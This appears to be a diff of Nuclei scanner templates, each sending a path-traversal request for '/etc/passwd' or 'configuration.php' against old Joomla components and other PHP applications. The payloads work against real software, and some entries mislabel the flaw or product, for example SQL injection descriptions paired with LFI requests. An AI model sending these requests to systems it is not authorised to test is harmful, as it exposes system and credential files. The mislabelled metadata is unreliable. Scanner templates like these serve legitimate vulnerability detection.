name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12318
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1491
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1540
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_blog - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11625
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1540
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1603
|
||||
|
||||
info:
|
||||
name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12284
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1603
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1653
|
||||
|
||||
info:
|
||||
name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12430
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1653
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1658
|
||||
|
||||
info:
|
||||
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12427
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1658
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1715
|
||||
|
||||
info:
|
||||
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12174
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1715
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,14 +1,19 @@
|
|||
id: maestro-unauth-rce
|
||||
id: CVE-2010-1870
|
||||
|
||||
info:
|
||||
name: ListSERV Maestro <= 9.0-8 RCE
|
||||
author: b0yd
|
||||
severity: info
|
||||
description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
|
||||
description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
|
||||
reference:
|
||||
- https://www.securifera.com/advisories/sec-2020-0001/
|
||||
- https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
|
||||
tags: rce,listserv,ognl
|
||||
tags: rce,listserv,ognl,cves,cve2010
|
||||
classification:
|
||||
cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N
|
||||
cvss-score: 5.0
|
||||
cve-id: CVE-2010-1870
|
||||
cwe-id: CWE-917
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -22,4 +27,4 @@ requests:
|
|||
- 'LISTSERV Maestro\s+9\.0-[123456780]'
|
||||
- 'LISTSERV Maestro\s+[5678]'
|
||||
- 'Administration Hub 9\.0-[123456780]'
|
||||
- 'Administration Hub [5678]'
|
||||
- 'Administration Hub [5678]'
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1873
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jvehicles - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11997
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1873
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1878
|
||||
|
||||
info:
|
||||
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12317
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1878
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1977
|
||||
|
||||
info:
|
||||
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12083
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1977
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-1982
|
||||
info:
|
||||
name: Joomla! Component JA Voice 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12121
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2045
|
||||
|
||||
info:
|
||||
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12595
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2045
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2050
|
||||
|
||||
info:
|
||||
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12611
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2050
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2128
|
||||
|
||||
info:
|
||||
name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12607
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2128
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2507
|
||||
|
||||
info:
|
||||
name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/13981
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2507
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2680
|
||||
|
||||
info:
|
||||
name: Joomla! Component jesectionfinder - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/14064
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2680
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2857
|
||||
|
||||
info:
|
||||
name: Joomla! Component Music Manager - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/14274
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2857
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2918
|
||||
|
||||
info:
|
||||
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/31708
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2918
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-3203
|
||||
|
||||
info:
|
||||
name: Joomla! Component PicSell 1.0 - Local File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/14845
|
||||
- https://www.cvedetails.com/cve/CVE-2010-3203
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4282
|
||||
|
||||
info:
|
||||
name: phpShowtime 2.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/15643
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4282
|
||||
tags: cve,cve2010,lfi,joomla
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4719
|
||||
|
||||
info:
|
||||
name: Joomla! Component JRadio - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/15749
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4719
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4769
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/15585
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4769
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4977
|
||||
|
||||
info:
|
||||
name: Joomla! Component Canteen 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/34250
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4977
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-5028
|
||||
|
||||
info:
|
||||
name: Joomla! Component JE Job 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12601
|
||||
- https://www.cvedetails.com/cve/CVE-2010-5028
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-5286
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/34837
|
||||
- https://www.cvedetails.com/cve/CVE-2010-5286
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2011-2744
|
||||
|
||||
info:
|
||||
name: Chyrp 2.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/35945
|
||||
- https://www.cvedetails.com/cve/CVE-2011-2744
|
||||
tags: cve,cve2011,lfi,chyrp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0981
|
||||
|
||||
info:
|
||||
name: phpShowtime 2.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/18435
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0981
|
||||
tags: cve,cve2012,lfi,phpshowtime
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0996
|
||||
|
||||
info:
|
||||
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36784
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0996
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-1226
|
||||
|
||||
info:
|
||||
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36873
|
||||
- https://www.cvedetails.com/cve/CVE-2012-1226
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -9,6 +9,11 @@ info:
|
|||
- https://www.exploit-db.com/exploits/38936
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
||||
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2013-7240
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2014-10037
|
||||
|
||||
info:
|
||||
name: DomPHP 0.83 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/30865
|
||||
- https://www.cvedetails.com/cve/CVE-2014-10037
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4539
|
||||
|
||||
info:
|
||||
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
|
||||
